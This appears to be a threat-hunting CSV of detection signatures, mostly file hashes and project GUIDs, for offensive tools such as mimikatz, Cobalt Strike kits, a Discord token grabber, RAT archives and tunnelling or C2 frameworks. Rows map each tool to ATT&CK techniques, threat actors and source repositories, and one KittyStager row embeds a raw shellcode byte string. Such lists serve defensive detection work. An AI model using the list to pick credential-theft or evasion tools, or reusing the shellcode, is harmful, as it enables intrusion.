"*5033ec3ed6f2c060b95608439b3d3f69295b6b9a344e638e1412a208fa2357b2*",".{0,1000}5033ec3ed6f2c060b95608439b3d3f69295b6b9a344e638e1412a208fa2357b2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26482"
"*50376d47e0c921dfc85a5117735f9de297efd826fe152b2fc44d3aa4281e13c5*",".{0,1000}50376d47e0c921dfc85a5117735f9de297efd826fe152b2fc44d3aa4281e13c5.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","26484"
"*50388787c5a5da5c25ca1f6bfdaf3f09c3c78d9f0306e87b7e7d191bf679d870*",".{0,1000}50388787c5a5da5c25ca1f6bfdaf3f09c3c78d9f0306e87b7e7d191bf679d870.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","26485"
"*503a03cf035644aae49c197df60a93374f8cf837d0078206e278194c79b6a42b*",".{0,1000}503a03cf035644aae49c197df60a93374f8cf837d0078206e278194c79b6a42b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26486"
"*503cf7c6f7afe5c03e8ed9bffa0b3b13443f1224e37b889e7add4c0dfe747322*",".{0,1000}503cf7c6f7afe5c03e8ed9bffa0b3b13443f1224e37b889e7add4c0dfe747322.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26488"
"*503e912598061959f6564c5be9aa4f4ad4ac2a6530f1d84387fcfb7915275285*",".{0,1000}503e912598061959f6564c5be9aa4f4ad4ac2a6530f1d84387fcfb7915275285.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26489"
"*503ed594a822f455532efad9786845a6499fb6de509591bdd37317a469de40c6*",".{0,1000}503ed594a822f455532efad9786845a6499fb6de509591bdd37317a469de40c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26490"
"*5042151210128f823c5cc143d52c6df18ea3bab1f834f7613d57600a6afc543e*",".{0,1000}5042151210128f823c5cc143d52c6df18ea3bab1f834f7613d57600a6afc543e.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","26492"
"*504e948af4200ab5d187a6687d50144bb1b3b95fa0ee4d7099e05ffd7f60f28c*",".{0,1000}504e948af4200ab5d187a6687d50144bb1b3b95fa0ee4d7099e05ffd7f60f28c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26495"
"*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*",".{0,1000}505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","26496"
"*50588c73e5448ff5254961039e431e5fd4ad532fbc58483c53870b77554c0ad2*",".{0,1000}50588c73e5448ff5254961039e431e5fd4ad532fbc58483c53870b77554c0ad2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26497"
"*5059f0c09b5561445b48a8566a3754caf1472f8539194b35428bb3ff7690f06e*",".{0,1000}5059f0c09b5561445b48a8566a3754caf1472f8539194b35428bb3ff7690f06e.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","26498"
"*505bb78684c53f9fb96c92611bbd7ed7096c166f3621fc602b4f0402e0605621*",".{0,1000}505bb78684c53f9fb96c92611bbd7ed7096c166f3621fc602b4f0402e0605621.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","26499"
"*5062dae017d539693b9e6cef1cf8018aa4963b6a01ef2614cff020fd85f8ba07*",".{0,1000}5062dae017d539693b9e6cef1cf8018aa4963b6a01ef2614cff020fd85f8ba07.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","26500"
"*50662415d68f78b67b116ea7f19ab8024bfa6fae117182488e53bf88fef2638a*",".{0,1000}50662415d68f78b67b116ea7f19ab8024bfa6fae117182488e53bf88fef2638a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26501"
"*5067F916-9971-47D6-BBCB-85FB3982584F*",".{0,1000}5067F916\-9971\-47D6\-BBCB\-85FB3982584F.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","#GUIDproject","N/A","N/A","10","1794","256","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z","26502"
"*506efcecbd3508595df39add1b44c29682bd595e2b1f6ac11476baa4a5ddabc8*",".{0,1000}506efcecbd3508595df39add1b44c29682bd595e2b1f6ac11476baa4a5ddabc8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26503"
"*5071ae9c0b80dd380ce78be640a8116f262c9a22ffe54cbbb062e9922ab18776*",".{0,1000}5071ae9c0b80dd380ce78be640a8116f262c9a22ffe54cbbb062e9922ab18776.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26504"
"*5071f02457717295c663c269c01d40b9e789d386281c3faa47ab1e88eb9fa7c5*",".{0,1000}5071f02457717295c663c269c01d40b9e789d386281c3faa47ab1e88eb9fa7c5.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26505"
"*5072c4beef28abdb0c53a1f33836facec9e651f6384dedb62611dc3a4d2403d5*",".{0,1000}5072c4beef28abdb0c53a1f33836facec9e651f6384dedb62611dc3a4d2403d5.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","26506"
"*5073563a45bb315d8f02df7058cb92b2b285160c90a159fc2e68e1a17d807bba*",".{0,1000}5073563a45bb315d8f02df7058cb92b2b285160c90a159fc2e68e1a17d807bba.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","26507"
"*507503b18f9fd0a2ad51c175946c3a591f84eade030a59f697c66991771ee8ee*",".{0,1000}507503b18f9fd0a2ad51c175946c3a591f84eade030a59f697c66991771ee8ee.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26508"
"*50760fb11c588feb1bd1134321070c53d5b67f7c151ecb37cfd5d8eac1900c66*",".{0,1000}50760fb11c588feb1bd1134321070c53d5b67f7c151ecb37cfd5d8eac1900c66.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26509"
"*507e8666c239397561c58609f7ea569c9c49ddbb900cd260e7e42b02d03cfd87*",".{0,1000}507e8666c239397561c58609f7ea569c9c49ddbb900cd260e7e42b02d03cfd87.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","#filehash","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","26511"
"*50832dcb77c29cfaadcf530487eb2e4430ae79e702f9866321a484d8d78dc28a*",".{0,1000}50832dcb77c29cfaadcf530487eb2e4430ae79e702f9866321a484d8d78dc28a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26513"
"*5086CE01-1032-4CA3-A302-6CFF2A8B64DC*",".{0,1000}5086CE01\-1032\-4CA3\-A302\-6CFF2A8B64DC.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","#GUIDproject","private github repo","8","","N/A","","","","26514"
"*508764b5a7645ca6cd2968f9ad4a37029a7fe1f45d90b46b2f6c03393f5e2730*",".{0,1000}508764b5a7645ca6cd2968f9ad4a37029a7fe1f45d90b46b2f6c03393f5e2730.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26515"
"*50941ad9fd99db6fca5debc3c89b3e899a9527d7*",".{0,1000}50941ad9fd99db6fca5debc3c89b3e899a9527d7.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","26518"
"*509e8855fc2ebcd22bd352a34ef1a0493c4cf10b488b5b2d2fece7ad168518f9*",".{0,1000}509e8855fc2ebcd22bd352a34ef1a0493c4cf10b488b5b2d2fece7ad168518f9.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","#filehash","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","26521"
"*509e9cb4861e4e01742bd96d7a380c47dd4dae47a7a6b18cd474763041c010b1*",".{0,1000}509e9cb4861e4e01742bd96d7a380c47dd4dae47a7a6b18cd474763041c010b1.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26522"
"*50a1eed798d16ac30f1bbf50599a29e81de2ac953f45a23174d8b3fb9902d744*",".{0,1000}50a1eed798d16ac30f1bbf50599a29e81de2ac953f45a23174d8b3fb9902d744.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26523"
"*50ba0bde643b62f3ddba44820ca5a45e5f7d45bf5305016150cfa4af7ab679e5*",".{0,1000}50ba0bde643b62f3ddba44820ca5a45e5f7d45bf5305016150cfa4af7ab679e5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26526"
"*50bcc21f5397941a6823e2a5ec6aa8ec5a8f43f7df1513abbaa5b850236ad4db*",".{0,1000}50bcc21f5397941a6823e2a5ec6aa8ec5a8f43f7df1513abbaa5b850236ad4db.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26527"
"*50C0BF9479EFC93FA9CF1AA99BD?CA923273B71A1*",".{0,1000}50C0BF9479EFC93FA9CF1AA99BD\?CA923273B71A1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","26528"
"*50c461593a4ad6f09903a04e528de6991e745be1a7b444c002987348d921fcb0*",".{0,1000}50c461593a4ad6f09903a04e528de6991e745be1a7b444c002987348d921fcb0.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26530"
"*50c8a6e0117fd0a8c8fddb948e91c8488d67782c2975f4d7f9f87ff9a528b377*",".{0,1000}50c8a6e0117fd0a8c8fddb948e91c8488d67782c2975f4d7f9f87ff9a528b377.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26531"
"*50cce787f7b403a73b352913648361af2949a21bb85b081acccdecc1ec4c63f4*",".{0,1000}50cce787f7b403a73b352913648361af2949a21bb85b081acccdecc1ec4c63f4.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","26532"
"*50ce414b7091cd91c05a9e3393cdf0dd44ee9ef14ac12736adfbd3180cd28a03*",".{0,1000}50ce414b7091cd91c05a9e3393cdf0dd44ee9ef14ac12736adfbd3180cd28a03.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26533"
"*50cf6bcfb14dc0fd05eb46a5b8a804541879a555c1e50ce64b766af9d486294b*",".{0,1000}50cf6bcfb14dc0fd05eb46a5b8a804541879a555c1e50ce64b766af9d486294b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26534"
"*50d8184f7bfb2ed1c762bd9d66fe437861bb3def73ad14bc9baf61f19d1fa9fd*",".{0,1000}50d8184f7bfb2ed1c762bd9d66fe437861bb3def73ad14bc9baf61f19d1fa9fd.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26536"
"*50dadf81bd1df69948628db113c62c4f08e8c12df21ec59b02aa65a4d593c906*",".{0,1000}50dadf81bd1df69948628db113c62c4f08e8c12df21ec59b02aa65a4d593c906.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26537"
"*50e67569fd7d2313ac7d9b446f5519a33ab4755ccb5c9829f84d8cbf4f6abc7c*",".{0,1000}50e67569fd7d2313ac7d9b446f5519a33ab4755ccb5c9829f84d8cbf4f6abc7c.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","26539"
"*50eb54d0976374701c6051c23b993708,4d67d3d82b1adcc1b96e743e9b0efaaa8a566e3d,a34e71ededf334d3d6a480e3738c91fccbb4d2c1fbeec7192db9793a2541e8ca*",".{0,1000}50eb54d0976374701c6051c23b993708,4d67d3d82b1adcc1b96e743e9b0efaaa8a566e3d,a34e71ededf334d3d6a480e3738c91fccbb4d2c1fbeec7192db9793a2541e8ca.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","#filehash","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","26540"
"*50feb4f8f0d8ae6d64d2b65957a4a6d597c451a89da5970d0bf37d1ef67a8fbb*",".{0,1000}50feb4f8f0d8ae6d64d2b65957a4a6d597c451a89da5970d0bf37d1ef67a8fbb.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26544"
"*51005077d771b96d6157772c5c78c59a94284e8bc4396cf7a52309ee262ca129*",".{0,1000}51005077d771b96d6157772c5c78c59a94284e8bc4396cf7a52309ee262ca129.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26545"
"*51033040fbc818f2b5fccb826fbd87b7c57f9599c6b8e48aa0f4bd1a397a09bb*",".{0,1000}51033040fbc818f2b5fccb826fbd87b7c57f9599c6b8e48aa0f4bd1a397a09bb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26546"
